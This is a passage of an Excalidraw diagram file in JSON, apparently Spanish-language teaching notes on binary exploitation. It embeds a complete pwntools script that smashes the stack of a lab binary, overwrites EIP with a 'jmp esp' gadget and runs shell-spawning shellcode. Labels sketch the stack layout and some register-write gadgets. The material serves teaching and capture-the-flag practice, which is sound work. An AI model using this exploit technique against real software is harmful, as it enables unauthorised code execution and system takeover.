			"originalText": "from pwn import *\n\n# Crear instancia del proceso del proograma a atacar\nio = gdb.debug('./level1')\n\n#Asignar un debuger y pausarlo\npause()\n\n# Cargar una copia del binario para buscar JMP ESP\nbinary = ELF('./level1')\n\n# Ensamblar la secuancia de jmp esp para buscarlo en el binario.\njmp_esp = asm('jmp esp')\njmp_esp = next(binary.search(jmp_esp))\n\nlog.info(\"Found jmp esp at %#x\" % jmp_esp)\n\n# Desbordar buffer con patrón cíclico para poder buscar la distancia del buffer.\n#\n#  EBP  0x6161616b ('kaaa')\n# *ESP  0xff84be30 <-- 'maaanaaaoaaapaaaqaaar...'\n# *EIP  0x6161616c ('laaa')\ncrash = False\n\nif crash:\n    pattern = cyclic(512)\n    io.sendline(pattern)\n    pause()\n    sys.exit()\n\n# Llenar la distancia del buffer con el patrón cíclico suficiente hasta EIP\nexploit = cyclic(cyclic_find(0x6161616c))\n\n# LLenar el hueco de EIP con 'jmp esp'\nexploit += pack(jmp_esp)\n\n# Añadir el shellcode\nexploit += asm(shellcraft.sh())\n\n# enviar el payload\nio.sendline(exploit)\n\n# Cargar la shell\nio.interactive()\n\n",
			"lineHeight": 1.2,
			"baseline": 709
		},
		{
			"type": "rectangle",
			"version": 2557,
			"versionNonce": 497519016,
			"isDeleted": false,
			"id": "d6r9m2e8_XXm-RMtILZGo",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -841.0665515946964,
			"y": 1638.0631611033211,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 474.4092476846014,
			"height": 66.88408893519352,
			"seed": 2011551946,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 3
			},
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false
		},
		{
			"type": "text",
			"version": 1579,
			"versionNonce": 430785752,
			"isDeleted": false,
			"id": "6w5zGc9v",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 90,
			"angle": 0,
			"x": -844.2134689688719,
			"y": 1581.4750000834458,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 90.67019028092477,
			"height": 37.138812700377414,
			"seed": 1141125002,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 30.949010583647848,
			"fontFamily": 3,
			"text": "buff1",
			"rawText": "buff1",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "buff1",
			"lineHeight": 1.2,
			"baseline": 30
		},
		{
			"type": "line",
			"version": 617,
			"versionNonce": 374871208,
			"isDeleted": false,
			"id": "rKjAtUrqVtWIo0EOQROzm",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -566.2448819554645,
			"y": 1635.926878772604,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0,
			"height": 72.44566319099354,
			"seed": 262778442,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					0,
					72.44566319099354
				]
			]
		},
		{
			"type": "line",
			"version": 692,
			"versionNonce": 710863320,
			"isDeleted": false,
			"id": "V1s19eBUeIysq-mTH6rri",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -680.4655511416902,
			"y": 1640.1336750589815,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0,
			"height": 64.52195049052231,
			"seed": 800150794,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					0,
					64.52195049052231
				]
			]
		},
		{
			"type": "text",
			"version": 680,
			"versionNonce": 1589591976,
			"isDeleted": false,
			"id": "yJ8KXvWt",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -672.886882619533,
			"y": 1584.897801649104,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 54.08319384404916,
			"height": 36.9318189174194,
			"seed": 630596554,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 30.776515764516166,
			"fontFamily": 3,
			"text": "rbp",
			"rawText": "rbp",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "rbp",
			"lineHeight": 1.2,
			"baseline": 30
		},
		{
			"type": "text",
			"version": 736,
			"versionNonce": 1603530456,
			"isDeleted": false,
			"id": "1vT5WzVu",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -557.4020815214365,
			"y": 1585.1090898659033,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 54.08319384404916,
			"height": 36.9318189174194,
			"seed": 192092810,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 30.776515764516166,
			"fontFamily": 3,
			"text": "rip",
			"rawText": "rip",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "rip",
			"lineHeight": 1.2,
			"baseline": 30
		},
		{
			"type": "text",
			"version": 517,
			"versionNonce": 118033064,
			"isDeleted": false,
			"id": "tPFOSYWL",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -826.9555734033881,
			"y": 1661.7429737201994,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 254.70703125,
			"height": 24.845145013413354,
			"seed": 82406538,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 20.704287511177796,
			"fontFamily": 3,
			"text": "aaaaaaabaaacaaadaa...",
			"rawText": "aaaaaaabaaacaaadaa...",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "aaaaaaabaaacaaadaa...",
			"lineHeight": 1.2,
			"baseline": 20
		},
		{
			"type": "text",
			"version": 315,
			"versionNonce": 299914200,
			"isDeleted": false,
			"id": "knBN48Mv",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -556.6838930053034,
			"y": 1664.348261912305,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 65.625,
			"height": 19.2,
			"seed": 1987816074,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 16,
			"fontFamily": 3,
			"text": "jmp esp",
			"rawText": "jmp esp",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "jmp esp",
			"lineHeight": 1.2,
			"baseline": 15
		},
		{
			"type": "line",
			"version": 315,
			"versionNonce": 971077032,
			"isDeleted": false,
			"id": "tJXrA9fMxkrLXrMVEcICv",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -482.44754165797417,
			"y": 1640.0138103077031,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0,
			"height": 66.86715432497141,
			"seed": 1508195594,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					0,
					66.86715432497141
				]
			]
		},
		{
			"type": "text",
			"version": 414,
			"versionNonce": 1733826776,
			"isDeleted": false,
			"id": "JTZGFPoR",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -444.8518900612539,
			"y": 1664.6708683406584,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 46.875,
			"height": 19.2,
			"seed": 1075392726,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 16,
			"fontFamily": 3,
			"text": "shell",
			"rawText": "shell",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "shell",
			"lineHeight": 1.2,
			"baseline": 15
		},
		{
			"type": "arrow",
			"version": 1209,
			"versionNonce": 1819574440,
			"isDeleted": false,
			"id": "RKY_eHurGMkg0vt5j2EOf",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -812.9839635899364,
			"y": 1151.7815980532203,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 228.32947448665834,
			"height": 7.83383322083148,
			"seed": 1628539978,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": {
				"elementId": "YaSr5vYl",
				"focus": 0.1813279451036821,
				"gap": 21.270934200928536
			},
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": "arrow",
			"points": [
				[
					0,
					0
				],
				[
					228.32947448665834,
					-7.83383322083148
				]
			]
		},
		{
			"type": "text",
			"version": 644,
			"versionNonce": 596590040,
			"isDeleted": false,
			"id": "3BUow8XW",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -819.9760216393186,
			"y": 1094.4850124926058,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 216.6295623779297,
			"height": 29.63912534872391,
			"seed": 1665222602,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 11.855650139489564,
			"fontFamily": 1,
			"text": "Trozo de código útil \nque deseamos encontrar en el binario",
			"rawText": "Trozo de código útil \nque deseamos encontrar en el binario",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Trozo de código útil \nque deseamos encontrar en el binario",
			"lineHeight": 1.25,
			"baseline": 24
		},
		{
			"type": "arrow",
			"version": 1625,
			"versionNonce": 242101160,
			"isDeleted": false,
			"id": "xTZWxjvTL-fS-O8KaSPd_",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -276.45482415960316,
			"y": 40.085609132883576,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 146.45029497201756,
			"height": 2.8132816408491763,
			"seed": 4497354,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"startBinding": {
				"elementId": "4tdOBX7S",
				"focus": 0.3418064100856349,
				"gap": 7.414633157566527
			},
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": "arrow",
			"points": [
				[
					0,
					0
				],
				[
					-146.45029497201756,
					2.8132816408491763
				]
			]
		},
		{
			"type": "text",
			"version": 991,
			"versionNonce": 2006565592,
			"isDeleted": false,
			"id": "4tdOBX7S",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -269.04019100203664,
			"y": 34.18747460370682,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 189.328125,
			"height": 13.851508199338424,
			"seed": 1810660118,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [
				{
					"id": "xTZWxjvTL-fS-O8KaSPd_",
					"type": "arrow"
				}
			],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 11.542923499448687,
			"fontFamily": 3,
			"text": "Carga el primer valor en RAX",
			"rawText": "Carga el primer valor en RAX",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Carga el primer valor en RAX",
			"lineHeight": 1.2,
			"baseline": 11
		},
		{
			"type": "arrow",
			"version": 591,
			"versionNonce": 972715688,
			"isDeleted": false,
			"id": "RePhAHWMj56yM0YacAlTx",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -1099.9230063398284,
			"y": -229.9440708626778,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 396.66364961560635,
			"height": 15.074593145856568,
			"seed": 25414486,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": {
				"elementId": "WrsiXadY",
				"focus": 0.5956205917876796,
				"gap": 27.155807470191917
			},
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": "arrow",
			"points": [
				[
					0,
					0
				],
				[
					396.66364961560635,
					15.074593145856568
				]
			]
		},
		{
			"type": "arrow",
			"version": 1346,
			"versionNonce": 1376495576,
			"isDeleted": false,
			"id": "ay9AKtd3is89V0NhySrNK",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -1079.0261370183155,
			"y": -90.02245935140348,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 378.2482292814793,
			"height": 92.87350332158985,
			"seed": 186656982,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": {
				"elementId": "WrsiXadY",
				"focus": 0.6138839745282078,
				"gap": 24.674358482806156
			},
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": "arrow",
			"points": [
				[
					0,
					0
				],
				[
					378.2482292814793,
					-92.87350332158985
				]
			]
		},
		{
			"type": "arrow",
			"version": 940,
			"versionNonce": 1673879976,
			"isDeleted": false,
			"id": "EhOCeCeq1TCRIa-btQNLm",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -1103.9133192375605,
			"y": -160.89909723371358,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 402.8353309395644,
			"height": 37.602616183080784,
			"seed": 2008629334,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": {
				"elementId": "WrsiXadY",
				"focus": 0.6135214312075487,
				"gap": 24.974439043966072
			},
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": "arrow",
			"points": [
				[
					0,
					0
				],
				[
					402.8353309395644,
					-37.602616183080784
				]
			]
		},
		{
			"type": "arrow",
			"version": 1910,
			"versionNonce": 788065496,
			"isDeleted": false,
			"id": "O3DzwUfgh9q1vVKqQa53F",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -689.483197912135,
			"y": 144.74117780779324,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 37.415497916327354,
			"height": 129.83463629342177,
			"seed": 812331402,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"startBinding": {
				"elementId": "WrsiXadY",
				"focus": -0.920516428030288,
				"gap": 13.379648658104884
			},
			"endBinding": {
				"elementId": "C3LvreHL",
				"focus": -0.27287274340277107,
				"gap": 15.440972329375086
			},
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": "arrow",
			"points": [
				[
					0,
					0
				],
				[
					-15.428591208024045,
					-118.84852497079333
				],
				[
					-37.415497916327354,
					-129.83463629342177
				]
			]
		},
		{
			"type": "arrow",
			"version": 391,
			"versionNonce": 184216744,
			"isDeleted": false,
			"id": "vz0Qn1o7gsh9tDIKnHriB",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -699.2438154459394,
			"y": 1415.3217570151726,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 319.1171346868482,
			"height": 52.421709188360296,
			"seed": 541734616,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": "arrow",
			"points": [
				[
					0,
					0
				],
				[
					-319.1171346868482,
					-52.421709188360296
				]
			]
		},
		{
			"type": "text",
			"version": 351,
			"versionNonce": 1744146904,
			"isDeleted": false,
			"id": "TLKDpR6B",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -678.4388796212763,
			"y": 1408.9328712064887,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 181.11988830566406,
			"height": 20,
			"seed": 198845400,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 16,
			"fontFamily": 1,
			"text": "Dirección a sobrescribir",
			"rawText": "Dirección a sobrescribir",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Dirección a sobrescribir",
			"lineHeight": 1.25,
			"baseline": 14
		},
		{
			"type": "arrow",
			"version": 1489,
			"versionNonce": 1766266792,
			"isDeleted": false,
			"id": "wDj0WgYAt8-0Pa-tHQwb9",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -278.6429395614849,
			"y": 73.95366620728652,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 153.44984928760238,
			"height": 1.9927311594723491,
			"seed": 1723609048,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"startBinding": {
				"elementId": "7p1eFc4J",
				"focus": -0.049481416333412416,
				"gap": 8.311690709918594
			},
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": "arrow",
			"points": [
				[
					0,
					0
				],
				[
					-153.44984928760238,
					1.9927311594723491
				]
			]
		},
		{
			"type": "text",
			"version": 1275,
			"versionNonce": 68523736,
			"isDeleted": false,
			"id": "7p1eFc4J",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -270.33124885156633,
			"y": 65.32087962789316,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 221.73046875,
			"height": 13.364550979365742,
			"seed": 415390376,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [
				{
					"id": "wDj0WgYAt8-0Pa-tHQwb9",
					"type": "arrow"
				}
			],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 11.137125816138118,
			"fontFamily": 3,
			"text": "Carga la dirección de lock1 en RCX",
			"rawText": "Carga la dirección de lock1 en RCX",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Carga la dirección de lock1 en RCX",
			"lineHeight": 1.2,
			"baseline": 10
		},
		{
			"type": "arrow",
			"version": 995,
			"versionNonce": 584442536,
			"isDeleted": false,
			"id": "0rtzFE-Hca6DcSX08AqUh",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -308.6000648165639,
			"y": 104.08089028154194,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 126.29141749780047,
			"height": 1.2538884600817823,
			"seed": 418400984,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": "arrow",
			"points": [
				[
					0,
					0
				],
				[
					-126.29141749780047,
					1.2538884600817823
				]
			]
		},
		{
			"type": "text",
			"version": 965,
			"versionNonce": 132971480,
			"isDeleted": false,
			"id": "5r7zQuO9",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -285.9661376483349,
			"y": 94.92370262289967,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 277.88671875,
			"height": 12.377746008037184,
			"seed": 1490948264,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 10.314788340030987,
			"fontFamily": 3,
			"text": "Inserta el valor de RAX en la dirección de RXC",
			"rawText": "Inserta el valor de RAX en la dirección de RXC",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Inserta el valor de RAX en la dirección de RXC",
			"lineHeight": 1.2,
			"baseline": 10
		},
		{
			"type": "arrow",
			"version": 2583,
			"versionNonce": 1985170856,
			"isDeleted": false,
			"id": "bMTj0pTcaqBNAAqdDLwoZ",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -271.71816767742905,
			"y": 151.6993753661091,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 146.45029497201756,
			"height": 2.8132816408491763,
			"seed": 1816633048,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"startBinding": {
				"elementId": "l3jLPpaa",
				"focus": 0.3417717334249534,
				"gap": 7.4146331575664135
			},
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": "arrow",
			"points": [
				[
					0,
					0
				],
				[
					-146.45029497201756,
					2.8132816408491763
				]
			]
		},
		{
			"type": "text",
			"version": 1470,
			"versionNonce": 1167048920,
			"isDeleted": false,
			"id": "l3jLPpaa",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -264.30353451986264,
			"y": 145.80124083693232,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 189.328125,
			"height": 13.851508199338424,
			"seed": 748553176,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [
				{
					"id": "bMTj0pTcaqBNAAqdDLwoZ",
					"type": "arrow"
				}
			],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 11.542923499448687,
			"fontFamily": 3,
			"text": "Carga el primer valor en RAX",
			"rawText": "Carga el primer valor en RAX",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Carga el primer valor en RAX",
			"lineHeight": 1.2,
			"baseline": 11
		},
		{
			"type": "arrow",
			"version": 2449,
			"versionNonce": 1827362984,
			"isDeleted": false,
			"id": "yKtqrYwZPRiberdBfScDb",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -273.9062830793108,
			"y": 185.56743244051205,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 153.44984928760238,
			"height": 1.9927311594723491,
			"seed": 1054853336,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"startBinding": {
				"elementId": "NnhU86TI",
				"focus": -0.049600521103456724,
				"gap": 8.311690709918594
			},
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": "arrow",
			"points": [
				[
					0,
					0
				],
				[
					-153.44984928760238,
					1.9927311594723491
				]
			]
		},
		{
			"type": "text",
			"version": 1756,
			"versionNonce": 747759064,
			"isDeleted": false,
			"id": "NnhU86TI",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -265.5945923693922,
			"y": 176.93464586111867,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 221.73046875,
			"height": 13.364550979365742,
			"seed": 245427672,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [
				{
					"id": "yKtqrYwZPRiberdBfScDb",
					"type": "arrow"
				}
			],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 11.137125816138118,
			"fontFamily": 3,
			"text": "Carga la dirección de lock2 en RCX",
			"rawText": "Carga la dirección de lock2 en RCX",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Carga la dirección de lock2 en RCX",
			"lineHeight": 1.2,
			"baseline": 10
		},
		{
			"type": "arrow",
			"version": 1474,
			"versionNonce": 172622760,
			"isDeleted": false,
			"id": "qmDtUE9fnnYn5Yr24kCbb",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -303.8634083343899,
			"y": 215.69465651476747,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 126.29141749780047,
			"height": 1.2538884600817823,
			"seed": 1962242776,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": "arrow",
			"points": [
				[
					0,
					0
				],
				[
					-126.29141749780047,
					1.2538884600817823
				]
			]
		},
		{
			"type": "text",
			"version": 1444,
			"versionNonce": 436693720,
			"isDeleted": false,
			"id": "4UGrRXJ1",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -281.2294811661608,
			"y": 206.53746885612514,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 277.88671875,
			"height": 12.377746008037184,
			"seed": 141645784,
			"groupIds": [],
			"frameId": null,
			"roundness": null,
			"boundElements": [],
			"updated": 1727618461525,
			"link": null,
			"locked": false,
			"fontSize": 10.314788340030987,
			"fontFamily": 3,
			"text": "Inserta el valor de RAX en la dirección de RXC",
			"rawText": "Inserta el valor de RAX en la dirección de RXC",
			"textAlign": "left",
			"verticalAlign": "top",
			"containerId": null,
			"originalText": "Inserta el valor de RAX en la dirección de RXC",
			"lineHeight": 1.2,
			"baseline": 10
		},
		{
			"type": "line",
			"version": 1189,
			"versionNonce": 1372467160,
			"isDeleted": false,
			"id": "lTyAKuBTH-GQ7Dtdv8_sd",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -950.027069941443,
			"y": 459.0594557087656,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0,
			"height": 46.17428763085621,
			"seed": 640214184,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
					0,
					0
				],
				[
					0,
					46.17428763085621
				]
			]
		},
		{
			"type": "line",
			"version": 1295,
			"versionNonce": 491739560,
			"isDeleted": false,
			"id": "mXv9M3KMz9g8-NaYfFZqF",
			"fillStyle": "solid",
			"strokeWidth": 2,
			"strokeStyle": "solid",
			"roughness": 1,
			"opacity": 100,
			"angle": 0,
			"x": -903.6914732452949,
			"y": 458.2842653367415,
			"strokeColor": "#1e1e1e",
			"backgroundColor": "transparent",
			"width": 0,
			"height": 46.17428763085621,
			"seed": 1557530072,
			"groupIds": [],
			"frameId": null,
			"roundness": {
				"type": 2
			},
			"boundElements": [],
			"updated": 1727618562433,
			"link": null,
			"locked": false,
			"startBinding": null,
			"endBinding": null,
			"lastCommittedPoint": null,
			"startArrowhead": null,
			"endArrowhead": null,
			"points": [
				[
